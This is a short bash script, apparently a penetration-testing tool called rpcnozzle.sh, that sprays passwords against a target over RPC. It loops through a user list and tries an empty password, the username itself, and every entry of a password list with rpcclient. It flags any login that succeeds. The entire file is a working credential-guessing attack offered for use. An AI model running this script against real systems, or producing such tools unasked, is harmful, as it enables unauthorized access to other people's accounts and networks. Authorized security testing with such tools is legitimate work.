rpcnozzle.sh v0.2

1. #!/bin/bash
2. # via [email protected]
3. # rpcnozzle.sh v0.2
4. # rpc password sprayer
5.  
6. ## var defs
7. noarg=1
8. nocreds=2
9. i=0
10.  
11. ## function defs
12. argumentcheck(){
13.   if [ $# -lt 3 ]; then
14.     echo "[!] Usage: $(basename $0) <UserList> <PassList> <TargetIP>"
15.     exit $noarg
16.   fi
17. }
18. validcheck(){
19.   if [[ $trpcpl =~ .*Authority.* ]]; then
20.     echo "[!] (Username): $u (Password): $p"
21.     i=$((i+1))
22.   fi
23.  }
24. rpcconnect(){
25.   trpcpl=$(rpcclient -U "$u%$p" -c  "getusername;quit" $1)
26. }
27. rpcnozzle(){
28.   echo "[i] Testing users and passwords"
29.   while read u; do
30.     p=""
31.     rpcconnect $3
32.     validcheck
33.     p="$u"
34.     rpcconnect $3
35.     validcheck  
36.     while read p; do
37.       rpcconnect $3
38.       validcheck
39.     done < $2
40.   done < $1
41. }
42. resultscheck(){
43.   if [ "$i" -gt 0 ]; then
44.     echo "[i] $i Set(s) of Credentials Found!"
45.     exit 0
46.   else
47.     echo "[!] No Credentials Found."
48.     exit $nocreds
49.   fi
50. }
51.  
52. ## spray all the things
53. argumentcheck "$@"
54. rpcnozzle "$@"
55. resultscheck